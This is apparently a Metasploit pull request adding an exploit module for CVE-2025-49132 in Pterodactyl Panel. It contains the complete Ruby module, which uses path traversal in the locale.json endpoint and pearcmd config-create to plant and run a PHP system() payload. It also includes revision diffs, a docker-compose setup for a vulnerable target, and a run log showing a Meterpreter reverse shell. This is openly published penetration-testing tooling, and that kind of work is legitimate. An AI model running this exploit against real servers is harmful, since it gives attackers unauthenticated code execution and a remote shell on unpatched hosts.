### PR TITLE
Add Pterodactyl Panel locale.json RCE [CVE-2025-49132]

### DIFF
--- a/documentation/modules/exploit/linux/http/pterodactyl_locales_locale_json.md
+++ b/documentation/modules/exploit/linux/http/pterodactyl_locales_locale_json.md
@@ -1,0 +1,168 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in Pterodactyl Panel before version 1.11.11 that allows unauthenticated
+remote code execution through improper handling of locale file operations. The vulnerability
+exists in the locale.json endpoint which allows path traversal and arbitrary file creation. Code execution
+is in the context of the user running the webserver.
+
+The exploit leverages PEAR (PHP Extension and Application Repository) for command injection by creating a
+malicious payload file in the /tmp through path traversal, then executing it via PHP execution with pearcmd.
+
+### Setup
+
+A vulnerable instance of Pterodactyl Panel (unpatched against CVE-2025-49132) can be setup with the following docker compose file:
+```
+version: '3.8'
+services:
+  database:
+    image: public.ecr.aws/docker/library/mariadb:10.5
+    ports:
+      - "3306:3306"
+    restart: always
+    environment:
+      MYSQL_DATABASE: panel
+      MYSQL_USER: pterodactyl
+      MYSQL_PASSWORD: password
+      MYSQL_ROOT_PASSWORD: root_password
+    volumes:
+      - db_data:/var/lib/mysql
+    healthcheck:
+      test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"]
+      interval: 10s
+      timeout: 5s
+      retries: 3
+      start_period: 30s
+
+  cache:
+    image: public.ecr.aws/docker/library/redis:alpine
+    restart: always
+
+  panel:
+    image: ghcr.io/pterodactyl/panel:v1.11.10
+    ports:
+      - "80:80"
+    environment:
+      DB_HOST: database
+      DB_DATABASE: panel
+      DB_USERNAME: pterodactyl
+      DB_PASSWORD: password
+      REDIS_HOST: cache
+      APP_URL: "http://localhost"
+      APP_ENV: "local"
+      APP_DEBUG: "true"
+      APP_SERVICE_AUTHOR: "support@example.com"
+      APP_TIMEZONE: "Asia/Shanghai"
+    depends_on:
+      database:
+        condition: service_healthy
+      cache:
+        condition: service_started
+    volumes:
+      - panel_data:/app/var/
+
+volumes:
+  db_data:
+  panel_data:
+```
+
+## Options
+
+### TARGETURI
+The base path to the Pterodactyl Panel instance. (Default: `/`)
+
+### UPLOAD_DIR
+The directory where the payload will be temporarily uploaded. This defaults to `/tmp`, which aligns with the default webroot behavior in standard Docker instances.
+
+### TRAVERSAL_PATH
+The path used to traverse to the PHP installation. (Default: `/usr/local/lib/php`)
+
+## Verification Steps
+
+1. Start `msfconsole`.
+2. Do: `use exploit/linux/http/pterodactyl_cve_2025_49132_rce`
+3. Set the `RHOSTS` option to the target IP address or hostname.
+4. Run the module.
+5. Receive a Meterpreter session or command shell as the web server user.
+
+## Scenarios
+
+### Pterodactyl Panel 1.11.10 in Docker
+```
+msf exploit(linux/http/pterodactyl_locales_locale_json) > options
+
+Module options (exploit/linux/http/pterodactyl_locales_locale_json):
+
+   Name             Current Setting     Required  Description
+   ----             ---------------     --------  -----------
+   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
+   RHOSTS           127.0.0.1           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT            80                  yes       The target port (TCP)
+   SSL              false               no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI        /                   yes       The base path to the Pterodactyl instance
+   TRAVERSAL_DEPTH  5                   no        Traversal path (defaults to the default install location of php in the )
+   TRAVERSAL_PATH   /usr/local/lib/php  no        Traversal path (defaults to the default install location of php in the )
+   UPLOAD_DIR       /tmp                no        Upload directory (defaults to the default webroot in the docker instance)
+   VHOST                                no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell)
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST           172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT           3343             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL,GET,WGET:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+   When FETCH_FILELESS is none:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      XGbXaVnc         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Command Payload
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(linux/http/pterodactyl_locales_locale_json) > run
+[*] Started reverse TCP handler on 172.16.199.1:3343
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Version found: 1.11.10
+[*] Uploading payload file to /tmp/akrwapxneo.php
+[*] Sending initial payload creation request...
+[*] Initial request response code: 200
+[*] Triggering payload execution...
+[*] Sending stage (3090404 bytes) to 172.16.199.1
+[+] Deleted /tmp/akrwapxneo.php
+[*] Meterpreter session 1 opened (172.16.199.1:3343 -> 172.16.199.1:51339) at 2026-05-13 16:03:07 -0700
+
+meterpreter > getuid
+Server username: nginx
+meterpreter > sysinfo
+Computer     : 4a80f1ad652d
+OS           :  (Linux 6.12.76-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

--- a/documentation/modules/exploit/linux/http/pterodactyl_locales_locale_json.md
+++ b/documentation/modules/exploit/linux/http/pterodactyl_locales_locale_json.md
@@ -76,10 +76,18 @@ The directory where the payload will be temporarily uploaded. This defaults to `
 ### TRAVERSAL_PATH
 The path used to traverse to the PHP installation. (Default: `/usr/local/lib/php`)
 
+### TRAVERSAL_DEPTH
+The number of parent-directory traversal segments used to reach the base path specified by `TRAVERSAL_PATH`. Increase
+or decrease this value depending on how many directories must be traversed from the vulnerable file operation location
+to the target PHP installation path. This works in combination with `TRAVERSAL_PATH`: `TRAVERSAL_DEPTH` controls how
+far up the filesystem the module traverses, and `TRAVERSAL_PATH` specifies the path to follow after that traversal.
+(Default: `5`)
+
+
 ## Verification Steps
 
 1. Start `msfconsole`.
-2. Do: `use exploit/linux/http/pterodactyl_cve_2025_49132_rce`
+2. Do: `use exploit/linux/http/pterodactyl_locales_locale_json`
 3. Set the `RHOSTS` option to the target IP address or hostname.
 4. Run the module.
 5. Receive a Meterpreter session or command shell as the web server user.

--- a/modules/exploits/linux/http/pterodactyl_locales_locale_json.rb
+++ b/modules/exploits/linux/http/pterodactyl_locales_locale_json.rb
@@ -46,6 +46,10 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
+        'Payload' => {
+          'BadChars' => "\x20\x27",
+          'EncoderType' => Msf::Encoder::Type::CmdPosixBase64
+        },
         'DisclosureDate' => '2025-06-19',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -147,9 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_encoded_payload
-    base64_payload = "echo #{Rex::Text.encode_base64(payload.raw)} | base64 -d | sh"
-    cmd_escaped = base64_payload.gsub(' ', '${IFS}')
-    "<?=system('#{cmd_escaped}')?>"
+    "<?=system('#{payload.encoded}')?>"
   end
 
   def build_exploit_url(traverse_path, filename, payload, upload_dir)

--- a/modules/exploits/linux/http/pterodactyl_locales_locale_json.rb
+++ b/modules/exploits/linux/http/pterodactyl_locales_locale_json.rb
@@ -1,3 +1,5 @@
+# frozen_string_literal: true
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -28,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
           '0xtensho', # Original PoC
           'jheysel-r7', # MSF Module
         ],
-        'License' => 'MSF_LICENSE',
+        'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2025-49132'],
           ['URL', 'https://github.com/0xtensho/CVE-2025-49132-poc']
@@ -58,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'The base path to the Pterodactyl instance', '/']),
         OptString.new('UPLOAD_DIR', [false, 'Upload directory (defaults to the default webroot in the docker instance)', '/tmp']),
         OptString.new('TRAVERSAL_PATH', [false, 'Traversal path (defaults to the default install location of php in the )', '/usr/local/lib/php']),
-        OptInt.new('TRAVERSAL_DEPTH', [false, 'Traversal path (defaults to the default install location of php in the )', 5]),
+        OptInt.new('TRAVERSAL_DEPTH', [false, 'Number of ../ segments to use during path traversal (default: 5)', 5]),
       ]
     )
   end
@@ -79,7 +81,19 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       version = json.dig('../../', 'config/app', 'version')
-      return CheckCode::Vulnerable("Version found: #{version}")
+      return CheckCode::Unknown unless version
+
+      rex_version = Rex::Version.new(version)
+
+      if rex_version < Rex::Version.new('1.11.11')
+        # Usually we return Appears for a version check but this version is only obtainable through exploiting
+        # the vulnerability itself, so we can be confident that if we see this version, it's vulnerable
+        return CheckCode::Vulnerable("Version found: #{version}")
+      else
+        # This code path should not be reachable in a patched version, but it's here just in case
+        return CheckCode::Safe("Version found: #{version}")
+      end
+
     elsif res&.code == 403 || res&.code == 404
       # Path traversal is being blocked
       return CheckCode::Safe

--- a/modules/exploits/linux/http/pterodactyl_locales_locale_json.rb
+++ b/modules/exploits/linux/http/pterodactyl_locales_locale_json.rb
@@ -1,0 +1,154 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Pterodactyl Panel CVE-2025-49132 Remote Code Execution',
+        'Description' => %q{
+          This module exploits a vulnerability in Pterodactyl Panel before version 1.11.11 that allows unauthenticated
+          remote code execution through improper handling of locale file operations. The vulnerability
+          exists in the locale.json endpoint which allows path traversal and arbitrary file creation. Code execution
+          is in the context of the user running the webserver.
+
+          The exploit leverages PEAR (PHP Extension and Application Repository) for command injection by creating a
+          malicious payload file in the /tmp through path traversal, then executing it via PHP execution with pearcmd.
+        },
+        'Author' => [
+          '0xtensho', # Original PoC
+          'jheysel-r7', # MSF Module
+        ],
+        'License' => 'MSF_LICENSE',
+        'References' => [
+          ['CVE', '2025-49132'],
+          ['URL', 'https://github.com/0xtensho/CVE-2025-49132-poc']
+        ],
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Command Payload',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd
+            }
+          ]
+        ],
+        'DisclosureDate' => '2025-06-19',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the Pterodactyl instance', '/']),
+        OptString.new('UPLOAD_DIR', [false, 'Upload directory (defaults to the default webroot in the docker instance)', '/tmp']),
+        OptString.new('TRAVERSAL_PATH', [false, 'Traversal path (defaults to the default install location of php in the )', '/usr/local/lib/php']),
+        OptInt.new('TRAVERSAL_DEPTH', [false, 'Traversal path (defaults to the default install location of php in the )', 5]),
+      ]
+    )
+  end
+
+  def check
+    # Try to detect the vulnerability by attempting a benign path traversal - this will not be accessible from a patched version
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'locales', 'locale.json?locale=../../&namespace=config/app')
+    )
+
+    if res&.code == 200
+      json = res&.get_json_document
+
+      if json.nil? || json.empty?
+        print_error('Response did not contain a valid JSON document')
+        return CheckCode::Unknown
+      end
+
+      version = json.dig('../../', 'config/app', 'version')
+      return CheckCode::Vulnerable("Version found: #{version}")
+    elsif res&.code == 403 || res&.code == 404
+      # Path traversal is being blocked
+      return CheckCode::Safe
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    payload_code = generate_encoded_payload
+    filename = "#{Rex::Text.rand_text_alpha(10).downcase}.php"
+    traversal_depth = '../' * datastore['TRAVERSAL_DEPTH']
+    upload_payload(payload_code, filename, traversal_depth)
+    execute_payload(filename, traversal_depth)
+  end
+
+  def upload_payload(payload_code, filename, traversal_depth)
+    upload_dir = datastore['UPLOAD_DIR']
+    payload_file = File.join(upload_dir, filename)
+
+    print_status("Uploading payload file to #{payload_file}")
+    traverse_path = "#{traversal_depth}#{datastore['TRAVERSAL_PATH'].sub(%r{^/}, '')}"
+    first_url = build_exploit_url(traverse_path, filename, payload_code, upload_dir)
+
+    print_status('Sending initial payload creation request...')
+    res1 = send_request_cgi(
+      'method' => 'GET',
+      'uri' => first_url
+    )
+
+    unless res1&.code == 200
+      fail_with(Failure::UnexpectedReply, "Failed to upload payload file, server responded with code: #{res1&.code || 'no response'}")
+    end
+
+    register_file_for_cleanup(payload_file)
+    print_status("Initial request response code: #{res1.code}")
+  end
+
+  def execute_payload(filename, traversal_depth)
+    print_status('Triggering payload execution...')
+    url2 = build_execution_url(filename.sub(/\.php$/, ''), traversal_depth)
+
+    res2 = send_request_cgi(
+      'method' => 'GET',
+      'uri' => url2
+    )
+
+    if res2
+      print_warning('The module received a response from the server, which may indicate the payload did not execute as expected')
+    end
+  end
+
+  def generate_encoded_payload
+    base64_payload = "echo #{Rex::Text.encode_base64(payload.raw)} | base64 -d | sh"
+    cmd_escaped = base64_payload.gsub(' ', '${IFS}')
+    "<?=system('#{cmd_escaped}')?>"
+  end
+
+  def build_exploit_url(traverse_path, filename, payload, upload_dir)
+    base_path = normalize_uri(target_uri.path, 'locales', 'locale.json')
+    url = "#{base_path}?+config-create+/&locale=#{traverse_path}&namespace=pearcmd&/#{payload}+/#{upload_dir}/#{filename}"
+    vprint_status("Exploit URL: #{url}")
+    url
+  end
+
+  def build_execution_url(filename_base, traversal_depth)
+    base_path = normalize_uri(target_uri.path, 'locales', 'locale.json')
+    url = "#{base_path}?locale=#{traversal_depth}#{datastore['UPLOAD_DIR']}&namespace=#{filename_base}"
+    vprint_status("Execution URL: #{url}")
+    url
+  end
+end

--- a/modules/exploits/linux/http/pterodactyl_locales_locale_json.rb
+++ b/modules/exploits/linux/http/pterodactyl_locales_locale_json.rb
@@ -36,7 +36,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/0xtensho/CVE-2025-49132-poc']
         ],
         'Platform' => %w[unix linux],
-        'Arch' => [ARCH_CMD],
         'Targets' => [
           [
             'Command Payload',
@@ -80,12 +79,11 @@ class MetasploitModule < Msf::Exploit::Remote
       json = res&.get_json_document
 
       if json.nil? || json.empty?
-        print_error('Response did not contain a valid JSON document')
-        return CheckCode::Unknown
+        return CheckCode::Unknown('Response did not contain a valid JSON document')
       end
 
       version = json.dig('../../', 'config/app', 'version')
-      return CheckCode::Unknown unless version
+      return CheckCode::Unknown('Response did not contain a valid version number') unless version
 
       rex_version = Rex::Version.new(version)
 
@@ -100,10 +98,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     elsif res&.code == 403 || res&.code == 404
       # Path traversal is being blocked
-      return CheckCode::Safe
+      return CheckCode::Safe('Path traversal is being blocked')
     end
 
-    CheckCode::Unknown
+    CheckCode::Unknown('Non-200 response received, unable to determine vulnerability status')
   end
 
   def exploit


### PR DESCRIPTION
This adds a module which exploits a vulnerability in Pterodactyl Panel before version 1.11.11 that allows unauthenticated remote code execution through improper handling of locale file operations. The vulnerability exists in the locale.json endpoint which allows path traversal and arbitrary file creation. This combination results of capabilities results in remote code execution is in the context of the user running the web server.

The exploit leverages PEAR (PHP Extension and Application Repository) for command injection by creating a malicious payload file in the /tmp through path traversal, then executing it via PHP execution with pearcmd.

A contributor submitted an file read auxiliary module PR for this CVE. They stopped responding, I was trying to get the module working to land it when I realized the CVE was an RCE with a straight forward publicly available PoC. I already had an environment setup so I thought I would just PR the RCE. 

## Verification

1. Start `msfconsole`.
2. Do: `use exploit/linux/http/pterodactyl_cve_2025_49132_rce`
3. Set the `RHOSTS` option to the target IP address or hostname.
4. Run the module.
5. Receive a Meterpreter session or command shell as the web server user.

## Testing 
```
msf exploit(linux/http/pterodactyl_locales_locale_json) > run
[*] Started reverse TCP handler on 172.16.199.1:3343
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Version found: 1.11.10
[*] Uploading payload file to /tmp/akrwapxneo.php
[*] Sending initial payload creation request...
[*] Initial request response code: 200
[*] Triggering payload execution...
[*] Sending stage (3090404 bytes) to 172.16.199.1
[+] Deleted /tmp/akrwapxneo.php
[*] Meterpreter session 1 opened (172.16.199.1:3343 -> 172.16.199.1:51339) at 2026-05-13 16:03:07 -0700
meterpreter > getuid
Server username: nginx
meterpreter > sysinfo
Computer     : 4a80f1ad652d
OS           :  (Linux 6.12.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```